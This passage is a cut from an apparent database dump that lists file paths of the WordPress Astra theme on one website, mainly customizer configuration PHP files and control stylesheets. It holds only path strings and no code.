(2617, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/deprecated/deprecated-functions.php', 'wp-content/themes/astra/inc/core/deprecated/deprecated-functions.php'),
(2618, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/deprecated/deprecated-hooks.php', 'wp-content/themes/astra/inc/core/deprecated/deprecated-hooks.php'),
(2619, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/index.php', 'wp-content/themes/astra/inc/core/index.php'),
(2620, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/markup/class-astra-markup.php', 'wp-content/themes/astra/inc/core/markup/class-astra-markup.php'),
(2621, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/sidebar-manager.php', 'wp-content/themes/astra/inc/core/sidebar-manager.php'),
(2622, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/theme-hooks.php', 'wp-content/themes/astra/inc/core/theme-hooks.php'),
(2623, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-customizer.php', 'wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-customizer.php'),
(2624, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-upgrade-link-configs.php', 'wp-content/themes/astra/inc/customizer/astra-pro/class-astra-pro-upgrade-link-configs.php'),
(2625, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/astra-pro/index.php', 'wp-content/themes/astra/inc/customizer/astra-pro/index.php'),
(2626, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-builder-customizer.php', 'wp-content/themes/astra/inc/customizer/class-astra-builder-customizer.php'),
(2627, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-callback.php', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-callback.php'),
(2628, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-partials.php', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-partials.php'),
(2629, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-register-sections-panels.php', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-register-sections-panels.php'),
(2630, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer-sanitizes.php', 'wp-content/themes/astra/inc/customizer/class-astra-customizer-sanitizes.php'),
(2631, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-customizer.php', 'wp-content/themes/astra/inc/customizer/class-astra-customizer.php'),
(2632, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-extended-base-configuration.php', 'wp-content/themes/astra/inc/customizer/class-astra-extended-base-configuration.php'),
(2633, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-font-families.php', 'wp-content/themes/astra/inc/customizer/class-astra-font-families.php'),
(2634, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-fonts-data.php', 'wp-content/themes/astra/inc/customizer/class-astra-fonts-data.php'),
(2635, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/class-astra-fonts.php', 'wp-content/themes/astra/inc/customizer/class-astra-fonts.php'),
(2636, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/accessibility/class-astra-accessibility-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/accessibility/class-astra-accessibility-configs.php'),
(2637, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/block-editor/class-astra-block-editor-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/block-editor/class-astra-block-editor-configs.php'),
(2638, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-button-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-button-component-configs.php'),
(2639, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-html-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-html-component-configs.php'),
(2640, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-social-icon-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/base/class-astra-social-icon-component-configs.php'),
(2641, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/class-astra-builder-base-configuration.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/class-astra-builder-base-configuration.php'),
(2642, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-above-footer-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-above-footer-configs.php'),
(2643, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-below-footer-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-below-footer-configs.php'),
(2644, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-copyright-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-copyright-configs.php'),
(2645, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-builder-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-builder-configs.php'),
(2646, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-menu-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-menu-configs.php'),
(2647, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-social-icons-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-footer-social-icons-configs.php'),
(2648, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-primary-footer-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-customizer-primary-footer-configs.php'),
(2649, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-button-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-button-component-configs.php'),
(2650, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-html-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-html-component-configs.php'),
(2651, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-widget-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/class-astra-footer-widget-component-configs.php'),
(2652, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/above-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/above-footer.php'),
(2653, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/below-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/below-footer.php'),
(2654, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/button-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/button-footer.php'),
(2655, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/copyright.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/copyright.php'),
(2656, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/footer-builder.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/footer-builder.php'),
(2657, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/html-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/html-footer.php'),
(2658, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/menu-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/menu-footer.php'),
(2659, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/primary-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/primary-footer.php'),
(2660, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/social-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/social-footer.php'),
(2661, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/widget-footer.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/widget-footer.php'),
(2662, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-above-header-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-above-header-configs.php'),
(2663, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-below-header-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-below-header-configs.php'),
(2664, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-edd-cart-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-edd-cart-configs.php'),
(2665, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-builder-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-builder-configs.php'),
(2666, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-widget-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-header-widget-configs.php'),
(2667, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-mobile-trigger-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-mobile-trigger-configs.php'),
(2668, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-off-canvas-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-off-canvas-configs.php'),
(2669, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-primary-header-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-primary-header-configs.php'),
(2670, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-site-identity-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-site-identity-configs.php'),
(2671, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-woo-cart-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-customizer-woo-cart-configs.php'),
(2672, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-account-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-account-component-configs.php'),
(2673, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-button-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-button-component-configs.php'),
(2674, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-html-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-html-component-configs.php'),
(2675, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-menu-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-menu-component-configs.php'),
(2676, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-search-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-search-component-configs.php'),
(2677, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-social-icon-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-social-icon-component-configs.php'),
(2678, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-mobile-menu-component-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-mobile-menu-component-configs.php'),
(2679, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/above-header.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/above-header.php'),
(2680, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/account.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/account.php'),
(2681, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/below-header.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/below-header.php'),
(2682, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/button.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/button.php'),
(2683, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/edd-cart.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/edd-cart.php'),
(2684, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-builder.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-builder.php'),
(2685, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-widget.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/header-widget.php'),
(2686, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/html.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/html.php'),
(2687, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/menu.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/menu.php'),
(2688, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-menu.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-menu.php'),
(2689, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-trigger.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/mobile-trigger.php'),
(2690, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/off-canvas.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/off-canvas.php'),
(2691, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/primary-header.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/primary-header.php'),
(2692, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.php'),
(2693, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/site-identity.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/site-identity.php'),
(2694, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/social.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/social.php'),
(2695, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/woo-cart.php', 'wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/woo-cart.php'),
(2696, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-customizer-button-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-customizer-button-configs.php'),
(2697, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-existing-button-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/buttons/class-astra-existing-button-configs.php'),
(2698, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/class-astra-customizer-config-base.php', 'wp-content/themes/astra/inc/customizer/configurations/class-astra-customizer-config-base.php'),
(2699, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-advanced-footer-colors-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-advanced-footer-colors-configs.php'),
(2700, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-body-colors-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-body-colors-configs.php'),
(2701, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-footer-colors-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/colors-background/class-astra-footer-colors-configs.php'),
(2702, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/comments/class-astra-comments-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/comments/class-astra-comments-configs.php'),
(2703, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/global-misc/class-astra-global-misc-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/global-misc/class-astra-global-misc-configs.php'),
(2704, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-blog-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-blog-layout-configs.php'),
(2705, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-blog-single-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-blog-single-layout-configs.php'),
(2706, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-footer-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-footer-layout-configs.php'),
(2707, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-header-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-header-layout-configs.php'),
(2708, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-sidebar-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-sidebar-layout-configs.php'),
(2709, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-site-container-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-site-container-layout-configs.php'),
(2710, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-site-identity-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-site-identity-configs.php'),
(2711, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-site-layout-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/layout/class-astra-site-layout-configs.php'),
(2712, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-archive-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-archive-typo-configs.php'),
(2713, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-body-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-body-typo-configs.php'),
(2714, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-content-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-content-typo-configs.php'),
(2715, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-global-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-global-typo-configs.php'),
(2716, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-header-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-header-typo-configs.php'),
(2717, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-headings-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-headings-typo-configs.php'),
(2718, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-single-typo-configs.php', 'wp-content/themes/astra/inc/customizer/configurations/typography/class-astra-single-typo-configs.php'),
(2719, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/minified/custom-controls.min-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/minified/custom-controls.min-rtl.css'),
(2720, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/minified/custom-controls.min.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/minified/custom-controls.min.css'),
(2721, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/alignment-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/alignment-rtl.css'),
(2722, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/alignment.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/alignment.css'),
(2723, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/background-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/background-rtl.css'),
(2724, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/background.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/background.css'),
(2725, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/border-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/border-rtl.css'),
(2726, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/border.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/border.css'),
(2727, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-link-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-link-rtl.css'),
(2728, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-link.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-link.css'),
(2729, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-presets-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-presets-rtl.css'),
(2730, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-presets.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/button-presets.css'),
(2731, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-group-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-group-rtl.css'),
(2732, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-group.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-group.css'),
(2733, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-palette-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-palette-rtl.css'),
(2734, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-palette.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-palette.css'),
(2735, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color-rtl.css'),
(2736, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/color.css'),
(2737, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/custom-controls-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/custom-controls-rtl.css'),
(2738, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/custom-controls.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/custom-controls.css'),
(2739, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-color-palette-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-color-palette-rtl.css'),
(2740, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-color-palette.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-color-palette.css'),
(2741, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-global-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-global-rtl.css'),
(2742, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-global.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-global.css'),
(2743, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-link-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-link-rtl.css'),
(2744, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-link.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-link.css'),
(2745, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-style-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-style-rtl.css'),
(2746, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-style.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/customizer-style.css'),
(2747, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/description-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/description-rtl.css'),
(2748, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/description.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/description.css'),
(2749, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/divider-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/divider-rtl.css'),
(2750, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/divider.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/divider.css'),
(2751, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-presets-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-presets-rtl.css'),
(2752, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-presets.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-presets.css'),
(2753, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-varient-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-varient-rtl.css'),
(2754, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-varient.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/font-varient.css'),
